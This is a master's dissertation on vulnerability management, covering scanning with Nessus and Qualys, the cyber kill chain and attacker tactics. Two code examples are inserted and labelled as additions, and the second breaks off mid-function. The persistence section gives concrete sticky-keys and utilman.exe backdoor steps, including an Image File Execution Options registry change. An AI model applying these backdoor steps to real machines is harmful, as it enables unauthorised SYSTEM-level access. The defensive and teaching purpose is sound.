17MCC1004 Vishnu

This document is a dissertation submitted by Pallerla Vishnu vardhan reddy for the degree of Master of Technology in Computer Science & Engineering with specialization in Cloud Computing from VIT University Chennai. It focuses on vulnerability management and simulation. The dissertation includes declarations, certificates, an abstract, acknowledgements and a table of contents. It discusses topics such as vulnerability assessments, the vulnerability management lifecycle, the cyber kill chain, techniques and tactics used by attackers, a literature review on related research, and the experimental design including the use of tools like Nessus, Qualys and Nmap.

Vulnerability Management and Simulation

A dissertation submitted in partial fulfillment

of the requirements for the degree of

Master of Technology
in

Computer Science & Engineering


with specialization in Cloud Computing

by

Pallerla Vishnu vardhan reddy


17MCC1004

School of Computing Science & Engineering,

VIT University Chennai,

Vandalur-Kelambakkam Road,

Chennai - 600127, India.

March 2019
Declaration

I hereby declare that the dissertation Vulnerability Management and Simulation


submitted by me to the School of Computing Science and Engineering, VIT University
Chennai, 600 127 in partial fulfillment of the requirements for the award of Master of
Technology in Computer Science & Engineering with specialization in Cloud
Computing is a bona-fide record of the work carried out by me under the supervision
of Dr. Neela Narayanan V.
I further declare that the work reported in this dissertation has not been submitted
and will not be submitted, either in part or in full, for the award of any other degree or
diploma of this institute or of any other institute or University.

Sign:

Name & Reg. No.:

Date:
School of Computing Science & Engineering

Certificate

This is to certify that the dissertation entitled Vulnerability Management and
Simulation submitted by Pallerla Vishnu vardhan reddy (Reg. No. 17MCC1005)
to VIT University Chennai, in partial fulfillment of the requirement for the award of
the degree of Master of Technology in Computer Science & Engineering with
specialization in Cloud Computing is a bona-fide work carried out under my
supervision. The dissertation fulfills the requirements as per the regulations of this
University and in my opinion meets the necessary standards for submission. The
contents of this dissertation have not been submitted and will not be submitted either
in part or in full, for the award of any other degree or diploma and the same is certified.

Supervisor Program Chair

Signature: .................... Signature: ....................

Name: .................... Name: ....................

Date: Date:

Examiner

Signature: ....................

Name: ....................

Date:

(Seal of the School)


Abstract

The number of vulnerabilities is increasing day by day, and it is becoming very easy
for attackers to compromise systems or perform DoS attacks and similar attacks on
organisations. Although there is a chance to defend against this kind of attack, the
people in the organization do not realize how essential it is to remove vulnerabilities
and patch software, applications and computer systems. This project focuses on finding
vulnerabilities and remediating them using vulnerability assessment scanners like Qualys
and Nessus. Vulnerability assessment helps the organization find loopholes or weaknesses
in security and improperly configured systems or devices, and take the necessary actions
to improve the security of its assets. In this project we also show an attack based on a
weakness in a Windows system, the ways to find and remediate vulnerabilities, and the
ways information related to an organization can be gathered.
Acknowledgements
I wish to express my sincere thanks to Dr. G. Viswanathan, Chancellor, Mr. Sankar
Viswanathan, Vice President, Ms. Kadhambari S. Viswanathan, Assistant Vice President,
Dr. Anand A. Samuel, Vice Chancellor and Dr. P. Gunasekaran, Pro-Vice Chancellor
for providing me an excellent academic environment and facilities for pursuing the
M.Tech. program. I am grateful to Dr. Vaidehi Vijayakumar, Dean of the School of
Computing Science and Engineering, VIT University, Chennai and to Dr. V. Vijayakumar,
Associate Dean. I wish to express my sincere gratitude to Dr. Geetha S, Program
Chair of M.Tech CSE/Big Data/Cloud Computing for providing me an opportunity to
do my project work. I would like to express my gratitude to my internal guide Dr. Neela
Narayana V and my external guide Mr. Natarajan Elangovan who in spite of their busy
schedule guided me on the correct path. I am thankful to Virtusa Private Service Limited
for giving me an opportunity to work on my project and helping me gain knowledge. I
thank my family and friends who motivated me during the course of the project work.
...

Contents

Declaration i

Certificate ii

Abstract iii

Acknowledgements iv

List of Figures vii

1 Introduction 1
1.1 Vulnerability Management . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1.1 Importance of Vulnerability Assessments . . . . . . . . . . . . . . . 3
1.2 Types of vulnerability assessments . . . . . . . . . . . . . . . . . . . . . . 3
1.3 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 4
1.4 Cyber Kill Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4.1 Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4.2 Weaponization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.4.3 Delivery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.4.4 Exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.4.5 Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.6 Command And Control . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.7 Actions On Objectives . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.4.8 Defense In Depth Recommendations . . . . . . . . . . . . . . . . . 8
1.5 Techniques and tactics based on real world observations . . . . . . . . . . 9
1.5.1 Initial Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
1.5.2 Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
1.5.3 Persistence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
1.5.4 Privilege Escalation . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.5.5 Defense Evasion . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.5.6 Credential Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
1.5.7 Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.5.8 Lateral Movement . . . . . . . . . . . . . . . . . . . . . . . . . . . 15


1.5.9 Collection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.5.10 Exfiltration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.5.11 Command and control . . . . . . . . . . . . . . . . . . . . . . . . . 17

2 Literature Survey 18
2.1 Vulnerability assessment and patching management . . . . . . . . . . . . . 18
2.2 The Research on a Patch Management System for Enterprise Vulnerabil-
ity Update . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
2.3 Automated and Safe Vulnerability Assessment . . . . . . . . . . . . . . . . 19
2.4 Integrated Vulnerability Management System for Enterprise Networks . . 19
2.5 Vulnerability Assessment and Penetration Testing of Web Application . . 20

3 Experimental Design & Setup 21


3.1 Nessus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
3.2 Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
3.3 Nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.4 Python . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
3.5 Maltego . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
3.6 OSINT Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.7 Command and Control Activity . . . . . . . . . . . . . . . . . . . . . . . 34

4 Experiments & Results 35


4.1 Vulnerability Management using Nessus . . . . . . . . . . . . . . . . . . . 35
4.1.1 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.2 Vulnerability Management using Qualys . . . . . . . . . . . . . . . . . . . 39
4.2.1 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.3 Cyber Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
4.3.1 code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52

5 Conclusions 53
5.1 Vulnerability management . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
5.1.1 Future Enhancement . . . . . . . . . . . . . . . . . . . . . . . . . . 53

Bibliography 55
List of Figures

1.1 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 2


1.2 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 6

3.1 Nessus Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22


3.2 Vulnerability Management Life Cycle . . . . . . . . . . . . . . . . . . . . . 24
3.3 Open Source Intelligence Framework (OSINT) . . . . . . . . . . . . . . . 32
3.4 sub domains of OSINT framework . . . . . . . . . . . . . . . . . . . . . . 33

4.1 List of scans performed . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36


4.2 Categorization of Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . 36
4.3 List of Vulnerabilities after Scanning . . . . . . . . . . . . . . . . . . . . . 37
4.4 Detail information about Vulnerability . . . . . . . . . . . . . . . . . . . . 38
4.5 Qualys Dashboard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
4.6 Knowledge Base of Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
4.7 Search List in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
4.8 Host Assets in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4.9 Asset Groups in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.10 Option profiles in Qualys . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.11 List of Scans Created . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.12 scan details after scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.13 Vulnerability with severity and operating system details . . . . . . . . . . 45
4.14 Vulnerabilities with detailed information . . . . . . . . . . . . . . . . . . . 45
4.15 scanning the active directory for SPN values . . . . . . . . . . . . . . . . . 46
4.16 Scanning the segment for live hosts . . . . . . . . . . . . . . . . . . . . . . 48
4.17 Transfering the payload to live hosts . . . . . . . . . . . . . . . . . . . . . 49
4.18 Command and control with the users . . . . . . . . . . . . . . . . . . . . . 50
4.19 Transfer the malicious file to the users . . . . . . . . . . . . . . . . . . . . 50
4.20 Exfiltration the confidential data . . . . . . . . . . . . . . . . . . . . . . . 51
4.21 Command and control code . . . . . . . . . . . . . . . . . . . . . . . . . . 52

Chapter 1

Introduction

1.1 Vulnerability Management

Information security has become one of the most highly demanded services in the last
few years, since ICT (information and communication technologies) now covers almost
the entire business world.

Nowadays many organizations store all kinds of information on computers, from bank
account details, personal staff data and client project details to marketing details, and
they therefore become the target of evaluation (TOE) for attackers seeking confidential
information. News reports and papers constantly describe malicious activities, data
breaches, DoS attacks and the like.

Information security (IS) means protecting sensitive information, and the systems that
hold confidential data, from unauthorized people and above all from unauthorized
modification, disruption and destruction. It would be very hard for an organization to
operate without information protection. Systems should be checked regularly for
vulnerabilities, and a solution has to be provided for each vulnerability found.

With the increase in the use of online resources and the web over the last twenty years,
the confidentiality, integrity and availability of information and resources are under
serious threat. Every day new ways of exploitation and hacking are found, so finding
vulnerabilities and installing security patches is very important for every internet-facing
organization. Identifying vulnerabilities and remediating or mitigating them has
therefore become a major task for organizations. To reduce the threat to and risk of
their resources, organizations conduct vulnerability assessments on a regular basis to
improve their security posture. Vulnerability scanners have become system security
tools that can identify existing vulnerabilities in systems before they are exploited.
Even though a number of vulnerability tools are available in the market, they cannot
guarantee that a computer cannot be exploited after its known vulnerabilities have
been fixed.

Figure 1.1: Vulnerability Management Life Cycle

A vulnerability assessment (VA) is the process of identifying, classifying, defining and
prioritizing vulnerabilities in applications, computer systems and network infrastructures,
and providing the organization doing the assessment with the awareness, knowledge and
risk background it needs to understand the risks and threats to its environment and
react appropriately.

A vulnerability assessment (VA) is intended to identify risks and threats to systems,
applications and so on. It typically involves the use of automated testing tools, such as
network security scanners, whose results are listed in a vulnerability assessment (VA)
report.

Any organization, or even an individual, that faces an increased risk of cyberattacks will
benefit from some form of vulnerability assessment, but large organizations and other
enterprises that are subject to ongoing attacks benefit most from vulnerability analysis.

Because security vulnerabilities and configuration weaknesses can enable hackers to
access applications and IT systems, it is essential for large enterprises to identify and
remediate vulnerabilities and weaknesses before they can be exploited. A comprehensive
vulnerability assessment (VA) together with a management program can help companies
improve the security of their systems and applications.

1.1.1 Importance of Vulnerability Assessments

A vulnerability assessment of an organization's assets provides the organization with
details of the security weaknesses or flaws of the applications in its environment, and
gives direction on how to assess and mitigate the risks associated with those weaknesses
and with evolving threats. This process gives the organization a better understanding of
its assets, applications, security flaws and overall risk, reducing the likelihood that an
attacker will breach its systems and steal confidential information.

1.2 Types of vulnerability assessments

Vulnerability assessments (VA) depend on discovering different types of system,
application or network vulnerabilities, which means the vulnerability assessment process
uses a variety of methodologies, tools and scanners to identify threats, vulnerabilities
and risks. Some of the different types of vulnerability assessment scans are:

1) Network-based vulnerability scans are used to discover possible network security
attacks. A network scan helps detect vulnerable systems on wired or wireless networks.

2) Host-based vulnerability scans are used to identify and locate vulnerabilities in
workstations, servers or other network hosts. A host-based scan usually examines
services that may also be discovered in network-based scans, but it offers greater
visibility into the patch history and configuration settings of the scanned systems.

3) Wireless network vulnerability scans of an organization's Wi-Fi networks focus mainly
on points of attack in the wireless network infrastructure. In addition to discovering
rogue access points, a wireless vulnerability scan can also validate whether a company's
network is securely configured.

4) Application vulnerability scans can be used to test websites or web applications in
order to discover known or new software vulnerabilities and misconfigurations in
networks, websites or web applications.

5) Database vulnerability scans can be used to discover the weak points in a database,
to prevent an attacker from carrying out attacks like SQL injection.

1.3 Vulnerability Management Life Cycle

The vulnerability management life cycle helps an organization identify weaknesses,
security flaws or misconfigurations in its computer systems, prioritize its assets, assess
the vulnerabilities, report them, remediate them and verify whether they have been
closed.

The vulnerability management life cycle that most organizations follow has the
following phases:

Discovery: Also called the asset inventory or information gathering phase. Here we
find the details of the assets to scan across the network, including open ports, running
services and operating systems, in order to identify vulnerabilities. A network baseline
is set up and security vulnerabilities are identified on a regular schedule.

Prioritize assets: Categorize the assets into business assets and groups based on their
business criticality or on the dependencies of projects.

Assess: Set up a baseline for the business to remediate vulnerabilities based on
criticality, risk and vulnerability threat, and on asset classification.

Report: Measure the risk associated with the assets according to the security policies.
Monitor suspicious activity, document the security risk and describe the known
vulnerabilities.

Remediate: Prioritize the vulnerabilities and fix them, establish proper controls to
mitigate the risks and demonstrate progress.

Verify: Verify through follow-up audits whether the threats have been remediated and
eliminated.
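The phases above, carried through in code as an added example that is not part of the dissertation: the asset inventory, the scanner findings (shaped loosely like a Nessus or Qualys export), the CVSS values and the risk weighting are all constructed assumptions, and the verification step shows why a finding must be rescanned before it is closed.

```python
"""Vulnerability management life cycle over constructed scan findings."""
from dataclasses import dataclass
from typing import Dict, List

# Discovery / Prioritize assets: constructed inventory, criticality 1 (low)..3 (high).
ASSETS: Dict[str, dict] = {
    "10.0.0.5": {"name": "hr-db-01", "criticality": 3},
    "10.0.0.7": {"name": "web-01", "criticality": 2},
    "10.0.0.9": {"name": "kiosk-01", "criticality": 1},
}

# Constructed scanner findings, one row per (host, plugin) as in a scan export.
FINDINGS: List[dict] = [
    {"host": "10.0.0.5", "plugin": "SMBv1 enabled", "cvss": 7.5, "exploit_available": True},
    {"host": "10.0.0.5", "plugin": "Self-signed certificate", "cvss": 4.0, "exploit_available": False},
    {"host": "10.0.0.7", "plugin": "Outdated OpenSSL", "cvss": 9.8, "exploit_available": True},
    {"host": "10.0.0.9", "plugin": "SMBv1 enabled", "cvss": 7.5, "exploit_available": True},
]


@dataclass
class Finding:
    host: str
    asset: str
    plugin: str
    cvss: float
    exploit_available: bool
    risk: float
    status: str = "open"  # open -> remediated -> verified


def severity_band(cvss: float) -> str:
    """CVSS v3 qualitative bands, as scanners use them in reports."""
    if cvss >= 9.0:
        return "critical"
    if cvss >= 7.0:
        return "high"
    if cvss >= 4.0:
        return "medium"
    return "low"


def assess(findings: List[dict], assets: Dict[str, dict]) -> List[Finding]:
    """Assess: weight CVSS by asset criticality and exploit availability
    (assumed multipliers), then order so the riskiest findings are fixed first."""
    out = []
    for f in findings:
        asset = assets.get(f["host"], {"name": "unknown", "criticality": 1})
        weight = 1.5 if f["exploit_available"] else 1.0
        risk = round(f["cvss"] * asset["criticality"] * weight, 1)
        out.append(Finding(f["host"], asset["name"], f["plugin"],
                           f["cvss"], f["exploit_available"], risk))
    return sorted(out, key=lambda x: x.risk, reverse=True)


def report(findings: List[Finding]) -> Dict[str, int]:
    """Report: count findings that are not yet verified closed, per severity band."""
    bands = {"critical": 0, "high": 0, "medium": 0, "low": 0}
    for f in findings:
        if f.status != "verified":
            bands[severity_band(f.cvss)] += 1
    return bands


def remediate(finding: Finding) -> None:
    """Remediate: record that a fix (patch or configuration change) was applied."""
    finding.status = "remediated"


def verify(findings: List[Finding], rescan: List[dict]) -> List[Finding]:
    """Verify: a remediated finding closes only if the follow-up scan no longer
    reports it; otherwise it is reopened. Returns everything still open."""
    still_reported = {(r["host"], r["plugin"]) for r in rescan}
    for f in findings:
        if f.status == "remediated":
            f.status = "open" if (f.host, f.plugin) in still_reported else "verified"
    return [f for f in findings if f.status != "verified"]


def run_cycle() -> List[Finding]:
    """One pass through the life cycle. The constructed rescan shows the kiosk
    patch did not take, so that finding is reopened rather than closed."""
    prioritized = assess(FINDINGS, ASSETS)
    print("remediation order:", [(f.asset, f.plugin, f.risk) for f in prioritized])
    print("before remediation:", report(prioritized))
    for f in prioritized:
        remediate(f)
    rescan = [{"host": "10.0.0.9", "plugin": "SMBv1 enabled"}]  # constructed rescan
    open_after = verify(prioritized, rescan)
    print("after verification:", report(prioritized))
    return open_after


if __name__ == "__main__":
    for f in run_cycle():
        print(f"still open: {f.asset} {f.plugin} ({f.status})")
```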

1.4 Cyber Kill Chain

The cyber kill chain is one of the most widely accepted approaches in industry for
understanding how an attacker carries out attacks on an organization. It explains how
hackers cause harm to an organization, and it helps security professionals establish
strong countermeasures and controls to secure the organization's assets. There are
seven stages in the cyber kill chain:
1) Reconnaissance
2) Weaponization
3) Delivery
4) Exploitation
5) Installation
6) Command and Control
7) Actions on Objectives

1.4.1 Reconnaissance

Reconnaissance is the first stage in the cyber kill chain; it is also called information
gathering or footprinting. At this stage the attacker collects and assesses details of the
organization's assets from both a non-technical and a technical perspective. The attacker
assesses the target of evaluation and works out which asset will give the most benefit
for exploitation. The hacker looks for information systems with exploitable
vulnerabilities and few protections. There are two types of information gathering:
1) Active information gathering
The hacker probes the target information systems; the goal is to uncover ports that are
vulnerable to exploitation and that help the hacker gain access to the system.
Examples:
Nmap
Maltego
Harvester

2) Passive information gathering

The hacker gathers information without interacting with the target systems.
Examples:
Whois

Social engineering

Figure 1.2: Vulnerability Management Life Cycle



1.4.2 Weaponization

Weaponization is the second stage in the cyber kill chain. During this stage malware is
developed by the hacker specifically for the vulnerabilities identified during information
gathering (reconnaissance). With the information gathered in the reconnaissance phase
the hacker builds a toolset to get into the network and meet the objectives. For example,
if a particular vulnerable version of secure shell is identified, the attacker would create
or build an exploit that takes advantage of that secure shell vulnerability. The exploit kit
tries to obtain administrative privileges and exploit the systems, and command and
control activity can be built if the system has internet access.

1.4.3 Delivery

In the cyber kill chain, delivery is the third stage; it involves transmitting the APT code
to the target information systems so that the attacker can take control. Based on present
research and analysis from the 2018 Verizon Data Breach Investigation Report, a network
attack is most likely to arise from a spear-phishing attack targeting an internal employee
of the organization.
A carefully crafted spear-phishing campaign against an organization, based on the data
gathered during the reconnaissance phase, would result in the organization's employees
executing the APT malware code on their information systems. The spear-phishing
message will most likely contain an attachment such as an Adobe PDF document or a
Microsoft Word document. This PDF or document would contain code that, when
executed, would result in the APT gaining control of the organizational network.
Another available opportunity for exploitation is inspecting the organization's public IP
space for improperly managed servers. A lack of cyber hygiene practices within the
organization's network results in exploitable production systems.

1.4.4 Exploitation

Exploitation is the fourth phase in the cyber kill chain. The malware code is executed
on the target network through a local or remote process, taking advantage of the
identified vulnerabilities to gain administrative access to the targeted organizational
information system.

1.4.5 Installation

After the exploitation of the system has succeeded, the malware code installs itself on
the targeted information system. After installation, the malware begins to download
other required software if network access is available. This lets the delivery payload
remain small and undetectable.
In this example the small size of the malware means it has limited functionality.
Therefore the APT downloads other components to penetrate further into the targeted
organization's network and to gain better control and ownership of the exploited
information systems.

1.4.6 Command And Control

In the cyber kill chain, command and control is the sixth phase. Command and control
(C2) is when the hacker has put in place their communication and management APT
code in the target network. This malicious software gives the hacker full control of the
targeted environment and allows the hacker to move deeper into the network, conduct
destruction, exfiltrate data and carry out denial of service operations.

1.4.7 Actions On Objectives

The objectives and actions of the malicious software depend on its specific mission.
The software could be focused on denial of service, destruction or data exfiltration.
In the case of data exfiltration, the software may be interested in organizational
proprietary confidential data such as customer personally identifiable information,
engineering designs and employee data. In the case of denial of service, the software may
disable a key component of the organization's infrastructure to disrupt services
temporarily, like the Ukrainian power outage in December 2015.
Finally, in the case of destruction, the software may seek to operate industrial control
systems outside their manufacturing specifications, resulting in catastrophic failure, as
the Stuxnet worm did.

1.4.8 Defense In Depth Recommendations

Organizations are recommended to implement a defense-in-depth plan that serves to
protect the organization's processes, technology and people in a holistic and layered
fashion. Some of the defense-in-depth areas include:
1) Implementing an enterprise-wide information security program with the authority
and backing of leadership.
2) Effective user awareness and training related to phishing (email-borne threats).
3) Implementing strong cyber hygiene practices in the organization.

1.5 Techniques and tactics based on real world observations

These are the techniques and tactics that attackers can use when compromising an
organization's systems. Here are 11 tactics that attackers can use:
1) Initial Access
2) Execution
3) Persistence
4) Privilege Escalation
5) Defense Evasion
6) Credential Access
7) Discovery
8) Lateral Movement
9) Collection
10) Exfiltration
11) Command and control

1.5.1 Initial Access

The initial access tactic represents the techniques attackers use to gain an initial
foothold within a system or network.
Below is a list of techniques used by attackers to get access to a system.
1) Drive-by Compromise
A drive-by compromise is when an adversary gains access to a system through a user
visiting a website over the normal course of browsing. With this technique, the user's
web browser is targeted for exploitation. This can happen in several ways, but there are
a few main components. Multiple ways of delivering exploit code to a browser exist,
including:
A legitimate website is compromised where adversaries have injected some form of
malicious code such as JavaScript, iFrames or cross-site scripting.
Malicious ads are paid for and served through legitimate ad providers.
Built-in web application interfaces are used for the insertion of some other kind of
object that can be used to display web content or contain a script that executes on the
visiting client (for example forum posts, comments, and other user-controllable web
content).
2) Exploit Public-Facing Application
The use of software, data, or commands to take advantage of a weakness in an
Internet-facing computer system or program in order to cause unintended or
unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design
vulnerability. These applications are often websites, but can include databases (like
SQL), standard services (like SMB or SSH), and any other applications with
Internet-accessible open sockets, such as web servers and related services. Depending
on the flaw being exploited this may include Exploitation for Defense Evasion.
3) Spearphishing Attachment
Spearphishing attachment is a specific variant of spearphishing. Spearphishing
attachment is different from other forms of spearphishing in that it employs malware
attached to an email. All forms of spearphishing are electronically delivered social
engineering targeted at a specific individual, company, or industry. In this scenario,
adversaries attach a file to the spearphishing email and usually rely upon User
Execution to gain execution.
4) Spearphishing Link
Spearphishing with a link is a specific variant of spearphishing. It is different from other
forms of spearphishing in that it employs links to download malware contained in email,
instead of attaching malicious files to the email itself, to avoid defenses that may
inspect email links.

1.5.2 Execution

The execution tactic represents techniques that result in execution of adversary-
controlled code on a local or remote system. This tactic is often used in conjunction
with initial access as the means of executing code once access is obtained, and with
lateral movement to expand access to remote systems on a network.
Below are a few techniques used for the execution tactic.
1) Command-Line Interface
Command-line interfaces provide a way of interacting with computer systems and are a
common feature across many types of operating system platforms. [1] One example
command-line interface on Windows systems is cmd, which can be used to perform a
number of tasks including execution of other software. Command-line interfaces can be
interacted with locally or remotely via a remote desktop application, reverse shell
session, and so on. Commands that are executed run with the current permission level
of the command-line interface process unless the command includes process invocation
that changes the permissions context for that execution (for example, Scheduled Task).
2) Graphical User Interface
The Graphical User Interface (GUI) is a common way to interact with an operating
system. Adversaries may use a system's GUI during an operation, commonly through a
remote interactive session such as Remote Desktop Protocol, instead of through a
Command-Line Interface, to search for information and execute files via mouse
double-click events, the Windows Run command, or other potentially hard to monitor
interactions.
3) PowerShell
PowerShell is a powerful interactive command-line interface and scripting environment
included in the Windows operating system. Adversaries can use PowerShell to perform
a number of actions, including discovery of information and execution of code.
Examples include the Start-Process cmdlet, which can be used to run an executable,
and the Invoke-Command cmdlet, which runs a command locally or on a remote
computer.

PowerShell may also be used to download and run executables from the Internet, which
can be executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including Empire,
PowerSploit, and PSAttack.
4) Scheduled Task
Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used
to schedule programs or scripts to be executed at a date and time. A task can also be
scheduled on a remote system, provided the proper authentication is met to use RPC
and file and printer sharing is turned on. Scheduling a task on a remote system typically
required being a member of the Administrators group on the remote system.

An adversary may use task scheduling to execute programs at system startup or on a
scheduled basis for persistence, to conduct remote Execution as part of Lateral
Movement, to gain SYSTEM privileges, or to run a process under the context of a
specified account.

1.5.3 Persistence

Persistence is any access, action, or configuration change to a system that gives an adversary a persistent presence on that system. Adversaries will often need to maintain access to systems through interruptions such as system restarts, loss of credentials, or other failures that would require a remote access tool to restart or an alternate backdoor for them to regain access.
1) Accessibility Features
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times, and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.

For simple binary replacement on Windows XP and later, as well as Windows Server 2003/R2 and later, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.

For the debugger method on Windows Vista and later, as well as Windows Server 2008 and later, a Registry key (under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options) may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected over RDP will cause the "debugger" program to be executed with SYSTEM privileges.


2) Account Manipulation
Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.

1.5.4 Privilege Escalation

Privilege Escalation is the result of actions that allow an adversary to obtain a higher level of permissions on a system or network. Certain tools or actions require a higher level of privilege to work and are likely necessary at many points throughout an operation. Adversaries can enter a system with unprivileged access and must take advantage of a system weakness to obtain local administrator or SYSTEM/root level privileges. A user account with administrator-like access can also be used. User accounts with permissions to access specific systems or perform specific functions necessary for adversaries to achieve their objective may also be considered an escalation of privilege.
1) Access Token Manipulation
Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. Microsoft promotes the use of access tokens as a security best practice: administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas.

1.5.5 Defense Evasion

Defense Evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as, or variations of, techniques in other categories that have the added benefit of subverting a particular defense or mitigation. Defense evasion may be considered a set of attributes the adversary applies to all other phases of the operation.
1) Bypass User Account Control
Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement, to allowing the user to perform the action if they are in the local administrators group and click through the prompt, to allowing them to enter an administrator password to complete the action.

1.5.6 Credential Access

Credential Access represents techniques resulting in access to or control over system, domain, or service credentials that are used within an enterprise environment. Adversaries will likely attempt to obtain legitimate credentials from users or administrator accounts (local system administrators or domain users with administrator access) to use within the network. This allows the adversary to assume the identity of the account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.
1) Brute Force
Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.

Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.

Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation, either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.

A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password against a wide range of accounts on a network to avoid the account lockouts that would normally occur when brute forcing a single account with many passwords.
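The lockout interaction described in the two paragraphs above, worked through as an added example (not part of the dissertation): a small model of a domain lockout policy shows why brute forcing one account locks it before the correct password is reached, why spraying one policy-compliant password across many accounts never trips the per-account counter, and what a detection for spraying therefore has to key on. The lockout threshold, window, directory, wordlist and source address are all constructed assumptions.

```python
"""Brute force vs. password spraying against an account lockout policy.

Added example, not part of the dissertation. The directory, wordlist,
policy values and source address are constructed.
"""
from collections import defaultdict, deque

LOCKOUT_THRESHOLD = 5      # failures before lockout (assumed policy value)
OBSERVATION_WINDOW = 600   # seconds over which failures are counted (assumed)

# Constructed directory: account -> password. Two users chose the same weak
# password that still satisfies a typical complexity policy.
DIRECTORY = {f"user{i:02d}": f"Str0ng!Pass{i:02d}" for i in range(1, 21)}
DIRECTORY["user07"] = "Winter2019!"
DIRECTORY["user15"] = "Winter2019!"

# Constructed wordlist; user01's real password sits after the lockout point.
WORDLIST = ["Password1", "Welcome1", "Summer2019", "Winter2019!",
            "Qwerty123", "Admin123", "Letmein1", "Str0ng!Pass01"]


class LockoutPolicy:
    """Counts failed logons per account and locks it once the threshold is hit."""

    def __init__(self, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW):
        self.threshold = threshold
        self.window = window
        self.failures = defaultdict(deque)   # account -> failure timestamps
        self.locked = set()

    def attempt(self, account, password, ts):
        """Return 'locked', 'success' or 'failure' for a single logon attempt."""
        if account in self.locked:
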